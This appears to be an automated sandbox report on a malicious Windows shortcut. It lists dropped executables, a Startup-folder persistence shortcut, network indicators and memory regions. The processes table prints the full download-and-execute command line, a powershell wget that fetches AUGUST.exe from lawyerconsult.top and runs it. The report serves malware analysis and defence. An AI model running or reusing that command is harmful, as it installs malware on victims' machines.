Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
MdkbG2pK4l.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command
line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30
2024, length=278528, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\lejp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\paogviura
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\rjhlrgwt
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\hello.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\DZIPR.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\DZIPR.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x0bed3222, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\161ebd1
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\32f7631
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oduknhyj.r2i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\eb07f5bb
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\f5c98f9e
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\wanynpfhxudgrp
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02
2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02
2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:34:02
2024, mtime=Wed Sep 25 15:34:02 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm
|
data
|
dropped
|
||
|
C:\Users\user\ekqqtq
|
data
|
dropped
|
||
|
C:\Users\user\ipqtwm
|
data
|
dropped
|
||
|
C:\Windows\Tasks\lnfast_x64.job
|
data
|
dropped
|
There are 18 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
&& C:\Users\user\AppData\Roaming/hello.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
|
|
|
|
C:\Users\user\AppData\Roaming\hello.exe
|
C:\Users\user\AppData\Roaming/hello.exe
|
|
|
|
C:\Users\user\DZIPR.exe
|
"C:\Users\user\DZIPR.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\SysWOW64\cmd.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\SysWOW64\explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 12 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://lawyerconsult.top/AUGUST.exe
|
172.94.3.25
|
|
|
|
fullimmersion777.com
|
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://www.digicert.c
|
unknown
|
||
|
http://www.vmware.com/0
|
unknown
|
||
|
https://www.datanumen.com/zip-repair/
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
|
unknown
|
||
|
http://www.info-zip.org/
|
unknown
|
||
|
http://www.vmware.com/0/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
|
unknown
|
||
|
http://c0rl.m%L
|
unknown
|
||
|
http://www.repairfile.com
|
unknown
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
http://support.datanumen.com
|
unknown
|
||
|
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
|
unknown
|
||
|
https://www.datanumen.com/support/
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
lawyerconsult.top
|
172.94.3.25
|
|
|
|
171.39.242.20.in-addr.arpa
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.94.3.25
|
lawyerconsult.top
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5193000
|
trusted library allocation
|
page read and write
|
|
|
|
3594000
|
heap
|
page read and write
|
|
|
|
4F9000
|
unkown
|
page readonly
|
|
|
|
46FF000
|
trusted library allocation
|
page read and write
|
|
|
|
57D0000
|
direct allocation
|
page read and write
|
|
|
|
5574000
|
trusted library allocation
|
page read and write
|
|
|
|
4F65000
|
trusted library allocation
|
page read and write
|
|
|
|
556D000
|
trusted library allocation
|
page read and write
|
|
|
|
5830000
|
direct allocation
|
page read and write
|
|
|
|
526E000
|
trusted library allocation
|
page read and write
|
|
|
|
4A62000
|
trusted library allocation
|
page read and write
|
|
|
|
369000
|
unkown
|
page readonly
|
|
|
|
5FF0000
|
direct allocation
|
page read and write
|
|
|
|
C7D000
|
trusted library allocation
|
page read and write
|
|
|
|
459000
|
unkown
|
page readonly
|
|
|
|
5C2000
|
unkown
|
page write copy
|
|
|
|
5500000
|
direct allocation
|
page read and write
|
|
|
|
31E6000
|
unkown
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
2E05000
|
unkown
|
page read and write
|
||
|
3D45000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
6AC6BFE000
|
unkown
|
page readonly
|
||
|
FBA000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
174C56D0000
|
trusted library allocation
|
page read and write
|
||
|
578D000
|
direct allocation
|
page read and write
|
||
|
2D8C000
|
heap
|
page read and write
|
||
|
51C4000
|
heap
|
page read and write
|
||
|
F54000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
174C1090000
|
trusted library allocation
|
page read and write
|
||
|
417000
|
unkown
|
page execute read
|
||
|
2658000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
6FE21000
|
unkown
|
page execute read
|
||
|
3FEF000
|
unkown
|
page read and write
|
||
|
3D9B000
|
unkown
|
page read and write
|
||
|
F57000
|
heap
|
page read and write
|
||
|
4F0A000
|
heap
|
page read and write
|
||
|
297C000
|
heap
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
31E1000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
4DE7000
|
heap
|
page read and write
|
||
|
334D000
|
stack
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
31EF000
|
stack
|
page read and write
|
||
|
3002000
|
unkown
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
2DD000
|
stack
|
page read and write
|
||
|
5CB000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
E29000
|
heap
|
page read and write
|
||
|
3DFC000
|
unkown
|
page read and write
|
||
|
70135000
|
unkown
|
page read and write
|
||
|
2FF0000
|
unkown
|
page read and write
|
||
|
27AA000
|
stack
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
F3C000
|
heap
|
page read and write
|
||
|
6C911000
|
unkown
|
page execute read
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
32DD000
|
unkown
|
page read and write
|
||
|
5CF000
|
unkown
|
page write copy
|
||
|
3F70000
|
unkown
|
page read and write
|
||
|
174C5876000
|
heap
|
page read and write
|
||
|
35C4000
|
unkown
|
page read and write
|
||
|
8C8000
|
unkown
|
page write copy
|
||
|
FBA000
|
heap
|
page read and write
|
||
|
32F1000
|
heap
|
page read and write
|
||
|
58A0000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
174C582D000
|
heap
|
page read and write
|
||
|
2CEF000
|
stack
|
page read and write
|
||
|
3190000
|
unkown
|
page read and write
|
||
|
2D2C000
|
stack
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
5C7000
|
unkown
|
page read and write
|
||
|
174C56B0000
|
trusted library allocation
|
page read and write
|
||
|
3FAB000
|
unkown
|
page read and write
|
||
|
282E000
|
stack
|
page read and write
|
||
|
98B000
|
unkown
|
page readonly
|
||
|
B30000
|
heap
|
page read and write
|
||
|
349B000
|
heap
|
page read and write
|
||
|
2AB6000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
40A0000
|
unkown
|
page read and write
|
||
|
5641000
|
unkown
|
page read and write
|
||
|
6FED1000
|
unkown
|
page read and write
|
||
|
D16000
|
heap
|
page read and write
|
||
|
2EEE000
|
unkown
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
5C8000
|
unkown
|
page write copy
|
||
|
37AF000
|
heap
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
174C55B0000
|
trusted library allocation
|
page read and write
|
||
|
70101000
|
unkown
|
page execute read
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
2FCB000
|
heap
|
page read and write
|
||
|
4B5000
|
heap
|
page read and write
|
||
|
6FED5000
|
unkown
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2AAE000
|
stack
|
page read and write
|
||
|
5039000
|
direct allocation
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
112F000
|
stack
|
page read and write
|
||
|
8A2000
|
unkown
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
2550000
|
heap
|
page read and write
|
||
|
70128000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
104F000
|
stack
|
page read and write
|
||
|
6AC67FE000
|
stack
|
page read and write
|
||
|
582000
|
unkown
|
page write copy
|
||
|
6FE55000
|
unkown
|
page read and write
|
||
|
5711000
|
unkown
|
page read and write
|
||
|
6FC000
|
heap
|
page read and write
|
||
|
3A10000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
298F000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
35C4000
|
unkown
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
3104000
|
unkown
|
page read and write
|
||
|
6FE51000
|
unkown
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
2751000
|
heap
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
28D0000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
57FE000
|
direct allocation
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
31E7000
|
unkown
|
page read and write
|
||
|
5E20000
|
unkown
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
D08000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
2551000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
D63000
|
heap
|
page read and write
|
||
|
174C0075000
|
heap
|
page read and write
|
||
|
31F1000
|
heap
|
page read and write
|
||
|
41C000
|
unkown
|
page execute read
|
||
|
4D2E000
|
direct allocation
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
27F0000
|
unkown
|
page readonly
|
||
|
D96000
|
heap
|
page read and write
|
||
|
2B2E000
|
unkown
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
6AC57FE000
|
unkown
|
page readonly
|
||
|
6AC637E000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
296E000
|
stack
|
page read and write
|
||
|
5A38000
|
unkown
|
page read and write
|
||
|
70135000
|
unkown
|
page read and write
|
||
|
30F0000
|
unkown
|
page read and write
|
||
|
40B2000
|
unkown
|
page read and write
|
||
|
4B50000
|
direct allocation
|
page read and write
|
||
|
174C0F60000
|
trusted library section
|
page readonly
|
||
|
174C54F0000
|
trusted library allocation
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
318F000
|
unkown
|
page read and write
|
||
|
51EE000
|
direct allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
5820000
|
unkown
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
2A00000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
3290000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2D60000
|
unkown
|
page readonly
|
||
|
174C5577000
|
trusted library allocation
|
page read and write
|
||
|
D8E000
|
stack
|
page read and write
|
||
|
3104000
|
unkown
|
page read and write
|
||
|
5A21000
|
unkown
|
page read and write
|
||
|
174C00FC000
|
heap
|
page read and write
|
||
|
5FE0000
|
unkown
|
page read and write
|
||
|
6AC58FC000
|
stack
|
page read and write
|
||
|
2DF0000
|
unkown
|
page readonly
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
34EB000
|
heap
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
6FE48000
|
unkown
|
page readonly
|
||
|
790000
|
heap
|
page read and write
|
||
|
2FF4000
|
unkown
|
page read and write
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
174C55B4000
|
trusted library allocation
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
D98000
|
heap
|
page read and write
|
||
|
E62000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
28F8000
|
heap
|
page read and write
|
||
|
417000
|
unkown
|
page read and write
|
||
|
5225000
|
trusted library allocation
|
page read and write
|
||
|
541E000
|
direct allocation
|
page read and write
|
||
|
6FEA0000
|
unkown
|
page readonly
|
||
|
DA4000
|
heap
|
page read and write
|
||
|
EAF000
|
stack
|
page read and write
|
||
|
EFA000
|
heap
|
page read and write
|
||
|
174C54E0000
|
trusted library allocation
|
page read and write
|
||
|
174C0F80000
|
trusted library section
|
page readonly
|
||
|
19D000
|
stack
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
70100000
|
unkown
|
page readonly
|
||
|
46B7000
|
heap
|
page read and write
|
||
|
6C941000
|
unkown
|
page read and write
|
||
|
2DCE000
|
unkown
|
page read and write
|
||
|
6AC64FE000
|
unkown
|
page readonly
|
||
|
5D8000
|
unkown
|
page write copy
|
||
|
371F000
|
unkown
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
253E000
|
stack
|
page read and write
|
||
|
174C0090000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
27BE000
|
heap
|
page read and write
|
||
|
4EC1000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
3104000
|
unkown
|
page read and write
|
||
|
329D000
|
unkown
|
page read and write
|
||
|
2540000
|
heap
|
page read and write
|
||
|
511000
|
unkown
|
page write copy
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
300F000
|
unkown
|
page read and write
|
||
|
320A000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
2971000
|
heap
|
page read and write
|
||
|
58A000
|
unkown
|
page write copy
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
3EF0000
|
unkown
|
page read and write
|
||
|
36E1000
|
heap
|
page read and write
|
||
|
304E000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
174C5710000
|
remote allocation
|
page read and write
|
||
|
174C0113000
|
heap
|
page read and write
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
174C56D0000
|
trusted library allocation
|
page read and write
|
||
|
482000
|
unkown
|
page write copy
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
353D000
|
heap
|
page read and write
|
||
|
174C55C9000
|
trusted library allocation
|
page read and write
|
||
|
174C56C0000
|
trusted library allocation
|
page read and write
|
||
|
F4A000
|
heap
|
page read and write
|
||
|
174C0913000
|
heap
|
page read and write
|
||
|
323D000
|
heap
|
page read and write
|
||
|
3D80000
|
unkown
|
page read and write
|
||
|
FB8000
|
heap
|
page read and write
|
||
|
174C55A0000
|
trusted library allocation
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
3527000
|
heap
|
page read and write
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
517D000
|
direct allocation
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
5641000
|
unkown
|
page read and write
|
||
|
8C9000
|
unkown
|
page read and write
|
||
|
43C000
|
stack
|
page read and write
|
||
|
174C00B9000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
174C0043000
|
heap
|
page read and write
|
||
|
174C5650000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
174C55A0000
|
trusted library allocation
|
page read and write
|
||
|
58B000
|
unkown
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
26AB000
|
stack
|
page read and write
|
||
|
6AC647E000
|
stack
|
page read and write
|
||
|
36B6000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
7DE000
|
stack
|
page read and write
|
||
|
4B90000
|
direct allocation
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
174BFF90000
|
heap
|
page read and write
|
||
|
8D0000
|
unkown
|
page readonly
|
||
|
5CA000
|
unkown
|
page write copy
|
||
|
E44000
|
heap
|
page read and write
|
||
|
31D0000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
31AA000
|
heap
|
page read and write
|
||
|
52D000
|
stack
|
page read and write
|
||
|
111F000
|
stack
|
page read and write
|
||
|
E44000
|
heap
|
page read and write
|
||
|
6AC5E7E000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
326D000
|
unkown
|
page read and write
|
||
|
6AC66FE000
|
unkown
|
page readonly
|
||
|
2E04000
|
unkown
|
page read and write
|
||
|
174C005C000
|
heap
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
54FE000
|
direct allocation
|
page read and write
|
||
|
3270000
|
unkown
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
6AC52F7000
|
stack
|
page read and write
|
||
|
CB4000
|
heap
|
page read and write
|
||
|
2B8E000
|
unkown
|
page read and write
|
||
|
2860000
|
heap
|
page read and write
|
||
|
5710000
|
unkown
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
174C5640000
|
trusted library allocation
|
page read and write
|
||
|
6FEC8000
|
unkown
|
page readonly
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
6FEA1000
|
unkown
|
page execute read
|
||
|
2BEE000
|
stack
|
page read and write
|
||
|
8DF000
|
stack
|
page read and write
|
||
|
6AC6DFE000
|
unkown
|
page readonly
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
174BFFC0000
|
heap
|
page read and write
|
||
|
561000
|
unkown
|
page read and write
|
||
|
3535000
|
heap
|
page read and write
|
||
|
2BC0000
|
direct allocation
|
page read and write
|
||
|
D17000
|
heap
|
page read and write
|
||
|
174C5550000
|
trusted library allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
3DCC000
|
unkown
|
page read and write
|
||
|
174C0802000
|
heap
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
5A21000
|
unkown
|
page read and write
|
||
|
41A000
|
unkown
|
page readonly
|
||
|
2978000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
311000
|
unkown
|
page execute read
|
||
|
5EE000
|
heap
|
page read and write
|
||
|
2D24000
|
heap
|
page read and write
|
||
|
174C5640000
|
trusted library allocation
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
174C588C000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
3768000
|
heap
|
page read and write
|
||
|
174C0815000
|
heap
|
page read and write
|
||
|
5CDE000
|
unkown
|
page read and write
|
||
|
2FA2000
|
heap
|
page read and write
|
||
|
FA1000
|
heap
|
page read and write
|
||
|
330C000
|
stack
|
page read and write
|
||
|
342D000
|
heap
|
page read and write
|
||
|
2D34000
|
unkown
|
page read and write
|
||
|
6AC65FE000
|
stack
|
page read and write
|
||
|
5280000
|
direct allocation
|
page read and write
|
||
|
174C5849000
|
heap
|
page read and write
|
||
|
174C091A000
|
heap
|
page read and write
|
||
|
5401000
|
unkown
|
page read and write
|
||
|
174C56C0000
|
trusted library allocation
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
F31000
|
heap
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
2DE0000
|
direct allocation
|
page read and write
|
||
|
31E6000
|
unkown
|
page read and write
|
||
|
E4E000
|
stack
|
page read and write
|
||
|
503D000
|
direct allocation
|
page read and write
|
||
|
2869000
|
heap
|
page read and write
|
||
|
D96000
|
heap
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
621000
|
heap
|
page read and write
|
||
|
174C0000000
|
heap
|
page read and write
|
